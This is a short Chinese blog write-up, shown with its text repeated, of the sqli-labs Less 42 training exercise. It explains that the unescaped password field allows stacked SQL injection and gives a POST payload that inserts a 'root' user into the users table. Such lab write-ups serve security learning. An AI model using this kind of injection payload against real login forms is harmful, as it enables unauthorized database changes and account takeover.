Forgot your password?
New User click here?
看源码,可以发现和less 24不同的一点在于password字段没有进行转义处理
那就对password字段进行堆叠注入
login_user=1&login_password=1‘;insert into users(id,username,password) value(15,‘root‘,‘root‘)#
登陆
标签:堆叠 登陆 roo div pre 一点 pass 不同 img
Forgot your password?
New User click here?
看源码,可以发现和less 24不同的一点在于password字段没有进行转义处理
那就对password字段进行堆叠注入
login_user=1&login_password=1‘;insert into users(id,username,password) value(15,‘root‘,‘root‘)#
登陆
【sqli-labs】 less42 POST -Error based -String -Stacked(POST型基于错误的堆叠查询字符型注入)
标签:堆叠 登陆 roo div pre 一点 pass 不同 img
原文地址:https://www.cnblogs.com/superkrissV/p/8387278.html
